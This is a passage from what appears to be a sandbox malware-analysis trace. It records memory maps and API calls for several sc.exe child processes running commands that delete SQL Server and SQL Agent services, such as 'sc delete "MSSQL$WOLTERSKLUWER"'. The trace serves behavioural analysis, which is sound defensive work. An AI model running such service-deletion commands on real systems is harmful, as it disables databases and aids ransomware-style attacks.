0x7ff67a7dd000 end_va = 0x7ff67a7defff entry_point = 0x0 region_type = private name = "private_0x00007ff67a7dd000" filename = "" Region: id = 1111 start_va = 0x7ff67a7df000 end_va = 0x7ff67a7dffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a7df000" filename = "" Region: id = 1112 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1113 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1663 start_va = 0x71f39e0000 end_va = 0x71f3adffff entry_point = 0x0 region_type = private name = "private_0x00000071f39e0000" filename = "" Region: id = 1664 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1665 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5168 start_va = 0x71f37f0000 end_va = 0x71f37fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071f37f0000" filename = "" Region: id = 5169 start_va = 0x71f3800000 end_va = 0x71f3806fff entry_point = 0x0 region_type = private name = "private_0x00000071f3800000" filename = "" Region: id = 5170 start_va = 0x71f38e0000 end_va = 0x71f399dfff entry_point = 0x71f38e0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5171 start_va = 0x71f3ae0000 end_va = 0x71f3b5ffff entry_point = 0x0 region_type = private name = "private_0x00000071f3ae0000" filename = "" Region: id = 5172 start_va = 0x71f3c00000 end_va = 0x71f3c0ffff entry_point = 0x0 region_type = private name = "private_0x00000071f3c00000" filename = "" Region: id = 5173 start_va = 0x7ff67a6b0000 end_va = 0x7ff67a7affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a6b0000" filename = "" Region: id = 5174 start_va = 0x7ff67a7db000 end_va = 0x7ff67a7dcfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a7db000" filename = "" Region: id = 5175 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5176 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5177 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5178 start_va = 0x71f39a0000 end_va = 0x71f39a6fff entry_point = 0x0 region_type = private name = "private_0x00000071f39a0000" filename = "" Region: id = 5179 start_va = 0x71f3c10000 end_va = 0x71f3ceefff entry_point = 0x71f3c10000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5180 start_va = 0x71f39b0000 end_va = 0x71f39c1fff entry_point = 0x71f39b0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 74 os_tid = 0xd48 [0077.145] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.146] __set_app_type (_Type=0x1) [0077.146] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.146] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.146] SetThreadUILanguage (LangId=0x0) returned 0x409 [0077.202] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0077.202] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.203] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.203] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.203] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.203] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.203] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.203] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.203] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.203] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.203] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.203] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.203] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.203] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.203] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.203] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.203] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.203] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.203] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.203] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.203] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.203] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.203] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.205] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x71f39e8a40 [0077.210] OpenServiceW (hSCManager=0x71f39e8a40, lpServiceName="MSSQL$PROGID", dwDesiredAccess=0x10000) returned 0x0 [0077.211] GetLastError () returned 0x424 [0077.211] _ultow (in: _Dest=0x424, _Radix=-208996184 | out: _Dest=0x424) returned="1060" [0077.211] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.212] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x71f38af860, nSize=0x2, Arguments=0x71f38af890 | out: lpBuffer="頰q") returned 0x62 [0077.213] GetFileType (hFile=0x24) returned 0x2 [0077.213] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x71f38af810 | out: lpMode=0x71f38af810) returned 1 [0077.229] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x71f39e9830*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x71f38af808, lpReserved=0x0 | out: lpBuffer=0x71f39e9830*, lpNumberOfCharsWritten=0x71f38af808*=0x62) returned 1 [0077.229] LocalFree (hMem=0x71f39e9830) returned 0x0 [0077.229] LocalFree (hMem=0x0) returned 0x0 [0077.229] CloseServiceHandle (hSCObject=0x71f39e8a40) returned 1 [0077.229] LocalFree (hMem=0x0) returned 0x0 [0077.229] exit (_Code=1060) Thread: id = 327 os_tid = 0x12a8 Process: id = "47" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xefa7000" os_pid = "0xd4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQL$WOLTERSKLUWER\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1114 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1115 start_va = 0xe8ffa70000 end_va = 0xe8ffa8ffff entry_point = 0x0 region_type = private name = "private_0x000000e8ffa70000" filename = "" Region: id = 1116 start_va = 0xe8ffa90000 end_va = 0xe8ffaa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8ffa90000" filename = "" Region: id = 1117 start_va = 0xe8ffab0000 end_va = 0xe8ffb2ffff entry_point = 0x0 region_type = private name = "private_0x000000e8ffab0000" filename = "" Region: id = 1118 start_va = 0xe8ffb30000 end_va = 0xe8ffb33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8ffb30000" filename = "" Region: id = 1119 start_va = 0xe8ffb40000 end_va = 0xe8ffb40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8ffb40000" filename = "" Region: id = 1120 start_va = 0xe8ffb50000 end_va = 0xe8ffb51fff entry_point = 0x0 region_type = private name = "private_0x000000e8ffb50000" filename = "" Region: id = 1121 start_va = 0x7df5ff590000 end_va = 0x7ff5ff58ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff590000" filename = "" Region: id = 1122 start_va = 0x7ff67a9e0000 end_va = 0x7ff67aa02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a9e0000" filename = "" Region: id = 1123 start_va = 0x7ff67aa08000 end_va = 0x7ff67aa08fff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa08000" filename = "" Region: id = 1124 start_va = 0x7ff67aa0e000 end_va = 0x7ff67aa0ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa0e000" filename = "" Region: id = 1125 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1126 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1666 start_va = 0xe8ffc90000 end_va = 0xe8ffd8ffff entry_point = 0x0 region_type = private name = "private_0x000000e8ffc90000" filename = "" Region: id = 1667 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1668 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5290 start_va = 0xe8ffa70000 end_va = 0xe8ffa7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e8ffa70000" filename = "" Region: id = 5291 start_va = 0xe8ffa80000 end_va = 0xe8ffa86fff entry_point = 0x0 region_type = private name = "private_0x000000e8ffa80000" filename = "" Region: id = 5292 start_va = 0xe8ffb60000 end_va = 0xe8ffc1dfff entry_point = 0xe8ffb60000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5293 start_va = 0xe8ffd90000 end_va = 0xe8ffe0ffff entry_point = 0x0 region_type = private name = "private_0x000000e8ffd90000" filename = "" Region: id = 5294 start_va = 0xe8ffed0000 end_va = 0xe8ffedffff entry_point = 0x0 region_type = private name = "private_0x000000e8ffed0000" filename = "" Region: id = 5295 start_va = 0x7ff67a8e0000 end_va = 0x7ff67a9dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a8e0000" filename = "" Region: id = 5296 start_va = 0x7ff67aa0c000 end_va = 0x7ff67aa0dfff entry_point = 0x0 region_type = private name = "private_0x00007ff67aa0c000" filename = "" Region: id = 5297 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5298 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5308 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5309 start_va = 0xe8ffc20000 end_va = 0xe8ffc26fff entry_point = 0x0 region_type = private name = "private_0x000000e8ffc20000" filename = "" Region: id = 5310 start_va = 0xe8ffee0000 end_va = 0xe8fffbefff entry_point = 0xe8ffee0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5311 start_va = 0xe8ffc30000 end_va = 0xe8ffc41fff entry_point = 0xe8ffc30000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 75 os_tid = 0xd50 [0078.136] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0078.136] __set_app_type (_Type=0x1) [0078.137] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0078.137] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0078.137] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.227] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.227] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.227] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.228] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.228] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.228] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.228] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.228] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.228] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.228] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.228] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.228] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.228] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.228] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.228] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.228] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.228] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.228] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.228] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.228] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0078.228] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0078.228] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0078.230] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xe8ffc98a00 [0078.250] OpenServiceW (hSCManager=0xe8ffc98a00, lpServiceName="MSSQL$WOLTERSKLUWER", dwDesiredAccess=0x10000) returned 0x0 [0078.250] GetLastError () returned 0x424 [0078.250] _ultow (in: _Dest=0x424, _Radix=-5048344 | out: _Dest=0x424) returned="1060" [0078.250] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0078.252] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xe8ffb2f7a0, nSize=0x2, Arguments=0xe8ffb2f7d0 | out: lpBuffer="顐￉è") returned 0x62 [0078.252] GetFileType (hFile=0x24) returned 0x2 [0078.252] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xe8ffb2f750 | out: lpMode=0xe8ffb2f750) returned 1 [0078.267] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xe8ffc99850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xe8ffb2f748, lpReserved=0x0 | out: lpBuffer=0xe8ffc99850*, lpNumberOfCharsWritten=0xe8ffb2f748*=0x62) returned 1 [0078.268] LocalFree (hMem=0xe8ffc99850) returned 0x0 [0078.268] LocalFree (hMem=0x0) returned 0x0 [0078.268] CloseServiceHandle (hSCObject=0xe8ffc98a00) returned 1 [0078.268] LocalFree (hMem=0x0) returned 0x0 [0078.268] exit (_Code=1060) Thread: id = 336 os_tid = 0x12f8 Process: id = "48" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xeeec000" os_pid = "0xd54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLAgent$PROGID\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1127 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1128 start_va = 0x9b64cf0000 end_va = 0x9b64d0ffff entry_point = 0x0 region_type = private name = "private_0x0000009b64cf0000" filename = "" Region: id = 1129 start_va = 0x9b64d10000 end_va = 0x9b64d23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b64d10000" filename = "" Region: id = 1130 start_va = 0x9b64d30000 end_va = 0x9b64daffff entry_point = 0x0 region_type = private name = "private_0x0000009b64d30000" filename = "" Region: id = 1131 start_va = 0x9b64db0000 end_va = 0x9b64db3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b64db0000" filename = "" Region: id = 1132 start_va = 0x9b64dc0000 end_va = 0x9b64dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b64dc0000" filename = "" Region: id = 1133 start_va = 0x9b64dd0000 end_va = 0x9b64dd1fff entry_point = 0x0 region_type = private name = "private_0x0000009b64dd0000" filename = "" Region: id = 1134 start_va = 0x7df5ffba0000 end_va = 0x7ff5ffb9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffba0000" filename = "" Region: id = 1135 start_va = 0x7ff67a8f0000 end_va = 0x7ff67a912fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a8f0000" filename = "" Region: id = 1136 start_va = 0x7ff67a91d000 end_va = 0x7ff67a91efff entry_point = 0x0 region_type = private name = "private_0x00007ff67a91d000" filename = "" Region: id = 1137 start_va = 0x7ff67a91f000 end_va = 0x7ff67a91ffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a91f000" filename = "" Region: id = 1138 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 1139 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1669 start_va = 0x9b64e10000 end_va = 0x9b64f0ffff entry_point = 0x0 region_type = private name = "private_0x0000009b64e10000" filename = "" Region: id = 1670 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1671 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5277 start_va = 0x9b64cf0000 end_va = 0x9b64cfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000009b64cf0000" filename = "" Region: id = 5278 start_va = 0x9b64d00000 end_va = 0x9b64d06fff entry_point = 0x0 region_type = private name = "private_0x0000009b64d00000" filename = "" Region: id = 5279 start_va = 0x9b64f10000 end_va = 0x9b64fcdfff entry_point = 0x9b64f10000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5280 start_va = 0x9b64fd0000 end_va = 0x9b6504ffff entry_point = 0x0 region_type = private name = "private_0x0000009b64fd0000" filename = "" Region: id = 5281 start_va = 0x9b65130000 end_va = 0x9b6513ffff entry_point = 0x0 region_type = private name = "private_0x0000009b65130000" filename = "" Region: id = 5282 start_va = 0x7ff67a7f0000 end_va = 0x7ff67a8effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a7f0000" filename = "" Region: id = 5283 start_va = 0x7ff67a91b000 end_va = 0x7ff67a91cfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a91b000" filename = "" Region: id = 5284 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5285 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5286 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5287 start_va = 0x9b64de0000 end_va = 0x9b64de6fff entry_point = 0x0 region_type = private name = "private_0x0000009b64de0000" filename = "" Region: id = 5288 start_va = 0x9b65050000 end_va = 0x9b6512efff entry_point = 0x9b65050000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 5289 start_va = 0x9b64df0000 end_va = 0x9b64e01fff entry_point = 0x9b64df0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 76 os_tid = 0xd58 [0077.902] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0077.902] __set_app_type (_Type=0x1) [0077.902] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0077.902] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0077.902] SetThreadUILanguage (LangId=0x0) returned 0x409 [0078.018] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0078.018] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0078.018] _wcsicmp (_String1="delete", _String2="query") returned -13 [0078.018] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0078.018] _wcsicmp (_String1="delete", _String2="start") returned -15 [0078.018] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0078.018] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0078.018] _wcsicmp (_String1="delete", _String2="control") returned 1 [0078.018] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0078.018] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0078.018] _wcsicmp (_String1="delete", _String2="config") returned 1 [0078.019] _wcsicmp (_String1="delete", _String2="description") returned -7 [0078.019] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0078.019] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0078.019] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0078.019] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0078.019] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0078.019] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0078.019] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0078.019] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0078.019] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0078.019] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0078.019] 